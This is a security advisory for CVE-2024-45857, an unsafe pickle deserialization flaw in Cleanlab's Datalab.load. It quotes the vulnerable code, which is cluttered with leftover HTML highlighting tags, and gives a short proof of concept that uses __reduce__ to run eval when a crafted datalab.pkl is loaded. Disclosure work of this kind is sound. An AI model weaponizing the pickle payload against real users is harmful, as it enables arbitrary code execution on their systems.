Cleanlab
Vulnerability Report

Unsafe deserialization in Datalab leads to arbitrary code execution

CVE Number

CVE-2024-45857

Summary

An arbitrary code execution vulnerability exists inside the serialize function of the cleanlab/datalab/internal/serialize.py file in the Datalabs module. The vulnerability requires a maliciously crafted datalabs.pkl file to exist within the directory passed to the Datalabs.load function, executing arbitrary code on the system loading the directory.

Products Impacted

This vulnerability exists in versions  v2.4.0 or newer of Cleanlab.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data

Details

To exploit this vulnerability, an attacker would create a directory and place a malicious file called datalabs.pkl in that directory before sending the directory to a victim user. When the victim user loads the directory with Datalabs.load, the vulnerable code is called. The vulnerability exists in the deserialize function of the _Serializer class in the cleanlab/datalab/internal/serialize.py file (shown below).

   @classmethod
    <span class="token keyword">def</span> <span class="token function">deserialize</span><span class="token punctuation">(</span>cls<span class="token punctuation">,</span> path<span class="token punctuation">:</span> str<span class="token punctuation">,</span> data<span class="token punctuation">:</span> Optional<span class="token punctuation">[</span>Dataset<span class="token punctuation">]</span> <span class="token operator">=</span> None<span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> Datalab<span class="token punctuation">:</span>
        <span class="token triple-quoted-string string">"""Deserializes the datalab object from disk."""</span>

        <span class="token keyword">if</span> <span class="token operator">not</span> os<span class="token punctuation">.</span>path<span class="token punctuation">.</span>exists<span class="token punctuation">(</span>path<span class="token punctuation">)</span><span class="token punctuation">:</span>
            <span class="token keyword">raise</span> ValueError<span class="token punctuation">(</span>f<span class="token string">"No folder found at specified path: {path}"</span><span class="token punctuation">)</span>

        <span class="token keyword">with</span> open<span class="token punctuation">(</span>os<span class="token punctuation">.</span>path<span class="token punctuation">.</span>join<span class="token punctuation">(</span>path<span class="token punctuation">,</span> OBJECT_FILENAME<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"rb"</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
            datalab<span class="token punctuation">:</span> Datalab <span class="token operator">=</span> pickle<span class="token punctuation">.</span>load<span class="token punctuation">(</span>f<span class="token punctuation">)</span>

        cls<span class="token punctuation">.</span>_validate_version<span class="token punctuation">(</span>datalab<span class="token punctuation">)</span>

        <span class="token comment"># Load the issues from disk.</span>
        issues_path <span class="token operator">=</span> os<span class="token punctuation">.</span>path<span class="token punctuation">.</span>join<span class="token punctuation">(</span>path<span class="token punctuation">,</span> ISSUES_FILENAME<span class="token punctuation">)</span>
        <span class="token keyword">if</span> <span class="token operator">not</span> hasattr<span class="token punctuation">(</span>datalab<span class="token punctuation">.</span>data_issues<span class="token punctuation">,</span> <span class="token string">"issues"</span><span class="token punctuation">)</span> <span class="token operator">and</span> os<span class="token punctuation">.</span>path<span class="token punctuation">.</span>exists<span class="token punctuation">(</span>issues_path<span class="token punctuation">)</span><span class="token punctuation">:</span>
            datalab<span class="token punctuation">.</span>data_issues<span class="token punctuation">.</span>issues <span class="token operator">=</span> pd<span class="token punctuation">.</span>read_csv<span class="token punctuation">(</span>issues_path<span class="token punctuation">)</span>

        issue_summary_path <span class="token operator">=</span> os<span class="token punctuation">.</span>path<span class="token punctuation">.</span>join<span class="token punctuation">(</span>path<span class="token punctuation">,</span> ISSUE_SUMMARY_FILENAME<span class="token punctuation">)</span>
        <span class="token keyword">if</span> <span class="token operator">not</span> hasattr<span class="token punctuation">(</span>datalab<span class="token punctuation">.</span>data_issues<span class="token punctuation">,</span> <span class="token string">"issue_summary"</span><span class="token punctuation">)</span> <span class="token operator">and</span> os<span class="token punctuation">.</span>path<span class="token punctuation">.</span>exists<span class="token punctuation">(</span>issue_summary_path<span class="token punctuation">)</span><span class="token punctuation">:</span>
            datalab<span class="token punctuation">.</span>data_issues<span class="token punctuation">.</span>issue_summary <span class="token operator">=</span> pd<span class="token punctuation">.</span>read_csv<span class="token punctuation">(</span>issue_summary_path<span class="token punctuation">)</span>

        <span class="token keyword">if</span> data <span class="token keyword">is</span> <span class="token operator">not</span> None<span class="token punctuation">:</span>
            <span class="token keyword">if</span> hash<span class="token punctuation">(</span>data<span class="token punctuation">)</span> <span class="token operator">!=</span> hash<span class="token punctuation">(</span>datalab<span class="token punctuation">.</span>_data<span class="token punctuation">)</span><span class="token punctuation">:</span>
                <span class="token keyword">raise</span> ValueError<span class="token punctuation">(</span>
                    <span class="token string">"Data has been modified since Lab was saved. "</span>
                    <span class="token string">"Cannot load Lab with modified data."</span>
                <span class="token punctuation">)</span>

            <span class="token keyword">if</span> len<span class="token punctuation">(</span>data<span class="token punctuation">)</span> <span class="token operator">!=</span> len<span class="token punctuation">(</span>datalab<span class="token punctuation">.</span>labels<span class="token punctuation">)</span><span class="token punctuation">:</span>
                <span class="token keyword">raise</span> ValueError<span class="token punctuation">(</span>
                    f<span class="token string">"Length of data ({len(data)}) does not match length of labels ({len(datalab.labels)})"</span>
                <span class="token punctuation">)</span>

            datalab<span class="token punctuation">.</span>_data <span class="token operator">=</span> Data<span class="token punctuation">(</span>data<span class="token punctuation">,</span> datalab<span class="token punctuation">.</span>task<span class="token punctuation">,</span> datalab<span class="token punctuation">.</span>label_name<span class="token punctuation">)</span>
            datalab<span class="token punctuation">.</span>data <span class="token operator">=</span> datalab<span class="token punctuation">.</span>_data<span class="token punctuation">.</span>_data

        <span class="token keyword">return</span> datalab
Python

The above code is called by the Datalab.load function shown below.

    @staticmethod
    <span class="token keyword">def</span> <span class="token function">load</span><span class="token punctuation">(</span>path<span class="token punctuation">:</span> str<span class="token punctuation">,</span> data<span class="token punctuation">:</span> Optional<span class="token punctuation">[</span>Dataset<span class="token punctuation">]</span> <span class="token operator">=</span> None<span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> <span class="token string">"Datalab"</span><span class="token punctuation">:</span>
        <span class="token triple-quoted-string string">"""Loads Datalab object from a previously saved folder.

        Parameters
        ----------
        `path` :
            Path to the folder previously specified in ``Datalab.save()``.

        `data` :
            The dataset used to originally construct the Datalab.
            Remember the dataset is not saved as part of the Datalab,
            you must save/load the data separately.

        Returns
        -------
        `datalab` :
            A Datalab object that is identical to the one originally saved.
        """</span>
        datalab <span class="token operator">=</span> _Serializer<span class="token punctuation">.</span>deserialize<span class="token punctuation">(</span>path<span class="token operator">=</span>path<span class="token punctuation">,</span> data<span class="token operator">=</span>data<span class="token punctuation">)</span>
        load_message <span class="token operator">=</span> f<span class="token string">"Datalab loaded from folder: {path}"</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>load_message<span class="token punctuation">)</span>
        <span class="token keyword">return</span> datalab
Python

When the user loads the directory with the maliciously crafted pickle file the code shown above will instantiate the _Serializer class and call the deserialize function which then searches for the datalab.pkl file before running pickle.load on the file. An example attack can be seen below, where first we create our exploit directory with the malicious pickle file.

<span class="token keyword">import</span> pickle

<span class="token keyword">class</span> <span class="token class-name">Exploit</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__reduce__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token punctuation">(</span>eval<span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token string">"print('pwned')"</span><span class="token punctuation">,</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    
open<span class="token punctuation">(</span><span class="token string">"./exploit/datalab.pkl"</span><span class="token punctuation">,</span> <span class="token string">"wb"</span><span class="token punctuation">)</span><span class="token punctuation">.</span>write<span class="token punctuation">(</span>pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>Exploit<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
Python

Once the file has been created, the vulnerability can be exploited by having the user load the malicious directory:

<span class="token keyword">from</span> cleanlab <span class="token keyword">import</span> Datalab

Datalab<span class="token punctuation">.</span>load<span class="token punctuation">(</span><span class="token string">"./exploit"</span><span class="token punctuation">)</span>
Python

Once the user runs this, the arbitrary code will be executed on the system.

Timeline

July, 11 2024 — Vendor disclosure via process outlined in security page

September 6, 2024 — Followed up with vendor letting them know we plan to publish on September 12, 2024

September 12, 2024 — Public disclosure

Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer